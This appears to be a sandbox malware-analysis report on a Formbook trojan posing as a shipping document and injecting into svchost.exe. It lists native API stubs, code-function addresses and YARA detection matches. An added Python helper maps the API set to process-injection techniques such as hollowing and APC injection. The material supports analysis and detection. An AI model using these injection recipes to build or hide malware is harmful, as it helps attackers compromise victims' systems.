            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272FA0 NtQuerySection,1_2_03272FA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272FB0 NtResumeThread,1_2_03272FB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272F90 NtProtectVirtualMemory,1_2_03272F90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272FE0 NtCreateFile,1_2_03272FE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272E30 NtWriteVirtualMemory,1_2_03272E30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272EA0 NtAdjustPrivilegesToken,1_2_03272EA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272E80 NtReadVirtualMemory,1_2_03272E80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272EE0 NtQueueApcThread,1_2_03272EE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272D30 NtUnmapViewOfSection,1_2_03272D30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272D00 NtSetInformationFile,1_2_03272D00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272D10 NtMapViewOfSection,1_2_03272D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272DB0 NtEnumerateKey,1_2_03272DB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272DD0 NtDelayExecution,1_2_03272DD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272C00 NtQueryInformationProcess,1_2_03272C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272C60 NtCreateKey,1_2_03272C60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272CA0 NtQueryInformationToken,1_2_03272CA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272CF0 NtOpenProcess,1_2_03272CF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272CC0 NtQueryVirtualMemory,1_2_03272CC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03273010 NtOpenDirectoryObject,1_2_03273010
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03273090 NtSetValueKey,1_2_03273090
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032739B0 NtGetContextThread,1_2_032739B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03273D10 NtOpenProcessToken,1_2_03273D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03273D70 NtOpenThread,1_2_03273D70
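            The native-API stubs listed above for the injected svchost.exe code (NtOpenProcess, NtAllocateVirtualMemory, NtWriteVirtualMemory, NtGetContextThread/NtSetContextThread, NtQueueApcThread, NtCreateSection/NtMapViewOfSection/NtUnmapViewOfSection, NtCreateProcessEx, NtResumeThread) are the primitives process injection is built from, and reading them as a set is more useful than reading them one at a time. The parser below takes a copied subset of those report lines, extracts the API set, and reports which well-known injection recipes the set fully covers and which one it does not. It is an added example and not part of the Joe Sandbox report; the recipe definitions are this example's own grouping, and "transacted hollowing" is included only to show a recipe the list leaves incomplete.

```python
"""Map sandbox 'Code function' lines to process-injection recipes (added example).

REPORT_LINES is a constructed subset copied from the svchost.exe function
list above; CLUSTERS is this example's own grouping of well-known recipes,
not a classification the sandbox performs.
"""
import re

# "Code function: <id> <Api,Api,...>,<id>" where the id is repeated after
# the API list; tolerates both "exeCode function:" and "exe | Code function:".
LINE_RE = re.compile(r"Code function:\s*(\d+_\d+_[0-9A-Fa-f]+):?\s+(.+?),\1\s*$")

REPORT_LINES = r"""
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272B60 NtClose,LdrInitializeThunk,1_2_03272B60
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03274340 NtSetContextThread,1_2_03274340
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03274650 NtSuspendThread,1_2_03274650
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272BF0 NtAllocateVirtualMemory,1_2_03272BF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272F30 NtCreateSection,1_2_03272F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272F60 NtCreateProcessEx,1_2_03272F60
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272FB0 NtResumeThread,1_2_03272FB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272F90 NtProtectVirtualMemory,1_2_03272F90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272E30 NtWriteVirtualMemory,1_2_03272E30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272E80 NtReadVirtualMemory,1_2_03272E80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272EE0 NtQueueApcThread,1_2_03272EE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272D30 NtUnmapViewOfSection,1_2_03272D30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272D10 NtMapViewOfSection,1_2_03272D10
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272DD0 NtDelayExecution,1_2_03272DD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272CF0 NtOpenProcess,1_2_03272CF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032739B0 NtGetContextThread,1_2_032739B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03273D70 NtOpenThread,1_2_03273D70
"""

# Injection recipes as sets of the native calls they cannot do without.
# Assumption of this example: a recipe counts as "covered" only when every
# call in its set has a stub in the sample.
CLUSTERS = {
    "thread-context hijack (write + NtSetContextThread)": {
        "NtOpenProcess", "NtAllocateVirtualMemory", "NtWriteVirtualMemory",
        "NtGetContextThread", "NtSetContextThread", "NtResumeThread"},
    "APC injection (NtQueueApcThread)": {
        "NtOpenThread", "NtWriteVirtualMemory", "NtQueueApcThread", "NtResumeThread"},
    "section mapping into another process": {
        "NtCreateSection", "NtMapViewOfSection", "NtUnmapViewOfSection"},
    "process hollowing (unmap, write, set context, resume)": {
        "NtUnmapViewOfSection", "NtAllocateVirtualMemory", "NtWriteVirtualMemory",
        "NtSetContextThread", "NtResumeThread"},
    "transacted hollowing (NTFS transactions)": {
        "NtCreateTransaction", "NtCreateSection", "NtMapViewOfSection",
        "NtRollbackTransaction"},
}


def extract_functions(text):
    """Return {function_id: [api, ...]} for every parsable report line."""
    out = {}
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            out[m.group(1)] = [a for a in m.group(2).split(",") if a]
    return out


def api_set(functions):
    """Flatten the per-function lists into one set of API names."""
    return {api for apis in functions.values() for api in apis}


def cluster_coverage(apis):
    """{recipe: (present, missing)} for every recipe in CLUSTERS."""
    return {name: (sorted(need & apis), sorted(need - apis))
            for name, need in CLUSTERS.items()}


def complete_clusters(apis):
    """Recipes for which no required call is missing."""
    return [name for name, (_, missing) in cluster_coverage(apis).items() if not missing]


def stubs_for(functions, api):
    """Function ids whose stub calls `api` (where to put a breakpoint)."""
    return sorted(fid for fid, apis in functions.items() if api in apis)


if __name__ == "__main__":
    funcs = extract_functions(REPORT_LINES)
    apis = api_set(funcs)
    for name, (present, missing) in cluster_coverage(apis).items():
        state = "COVERED" if not missing else f"missing {missing}"
        print(f"{name}: {state}")
    print("NtWriteVirtualMemory stub:", stubs_for(funcs, "NtWriteVirtualMemory"))
```

            The sandbox already raises the thread-injection and memory-mapping signatures from these same stubs; the value of grouping them yourself is that the missing-call list tells you which recipe the sample cannot be using, and stubs_for gives the function id to pivot to in the disassembly.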
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E6A279: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00E6A279
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E58638 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00E58638
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E65264 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00E65264
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E0E800
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E2DAF5
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E0FE40
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E0E060
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E14140
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E22345
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E80465
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E36452
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E325AE
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E2277A
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E808E2
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E16841
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E369C4
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E18968
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E5E928
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E68932
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E3890F
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E2CCA1
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E36F36
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E170FE
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E13190
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E01287
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E2F359
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E23307
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E15680
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E21604
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E158C0
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E27813
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E21AF8
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E39C35
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E87E0D
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E2BF26
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E21F10
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00FEADF8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00418573
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00410033
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00403097
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004030A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040E0B3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402A30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042EAD3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00403430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004024D01_2_004024D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FE131_2_0040FE13
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004026A01_2_004026A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041674E1_2_0041674E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004167531_2_00416753
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FA3521_2_032FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E3F01_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033003E61_2_033003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E02741_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C02C01_2_032C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032301001_2_03230100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA1181_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C81581_2_032C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F41A21_2_032F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033001AA1_2_033001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F81CC1_2_032F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D20001_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032407701_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032647501_2_03264750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323C7C01_2_0323C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325C6E01_2_0325C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032405351_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033005911_2_03300591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E44201_2_032E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F24461_2_032F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EE4F61_2_032EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FAB401_2_032FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F6BD71_2_032F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA801_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032569621_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A01_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0330A9A61_2_0330A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324A8401_2_0324A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032428401_2_03242840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032268B81_2_032268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E8F01_2_0326E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03282F281_2_03282F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03260F301_2_03260F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E2F301_2_032E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B4F401_2_032B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BEFA01_2_032BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03232FC81_2_03232FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FEE261_2_032FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240E591_2_03240E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252E901_2_03252E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FCE931_2_032FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FEEDB1_2_032FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324AD001_2_0324AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DCD1F1_2_032DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03258DBF1_2_03258DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323ADE01_2_0323ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240C001_2_03240C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0CB51_2_032E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230CF21_2_03230CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F132D1_2_032F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322D34C1_2_0322D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0328739A1_2_0328739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032452A01_2_032452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E12ED1_2_032E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325D2F01_2_0325D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325B2C01_2_0325B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327516C1_2_0327516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322F1721_2_0322F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0330B16B1_2_0330B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324B1B01_2_0324B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F70E91_2_032F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FF0E01_2_032FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EF0CC1_2_032EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032470C01_2_032470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FF7B01_2_032FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032856301_2_03285630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F16CC1_2_032F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F75711_2_032F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DD5B01_2_032DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033095C31_2_033095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FF43F1_2_032FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032314601_2_03231460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFB761_2_032FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325FB801_2_0325FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B5BF01_2_032B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327DBF91_2_0327DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B3A6C1_2_032B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFA491_2_032FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F7A461_2_032F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DDAAC1_2_032DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03285AA01_2_03285AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E1AA31_2_032E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EDAC61_2_032EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D59101_2_032D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032499501_2_03249950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325B9501_2_0325B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AD8001_2_032AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032438E01_2_032438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFF091_2_032FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFFB11_2_032FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03241F921_2_03241F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03203FD21_2_03203FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03203FD51_2_03203FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03249EB01_2_03249EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F7D731_2_032F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03243D401_2_03243D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F1D5A1_2_032F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325FDC01_2_0325FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B9C321_2_032B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFCF21_2_032FFCF2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03287E54 appears 107 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03275130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0322B970 appears 262 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 032AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 032BF290 appears 103 times
Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: String function: 00E28A80 appears 42 times
Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: String function: 00E07F41 appears 35 times
Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: String function: 00E20C63 appears 70 times
Source: SHIPPING DOC MBL+HBL.exe, 00000000.00000003.1708707067.0000000003B93000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs SHIPPING DOC MBL+HBL.exe
Source: SHIPPING DOC MBL+HBL.exe, 00000000.00000003.1709933601.0000000003D8D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs SHIPPING DOC MBL+HBL.exe
Source: SHIPPING DOC MBL+HBL.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.2131318736.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.3566928575.0000000003400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.3568694635.0000000004C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.2129407938.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.3567072049.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.3565538257.0000000003050000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3567001047.00000000036E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.2132245829.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@13/7
Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E6A0F4 GetLastError,FormatMessageW
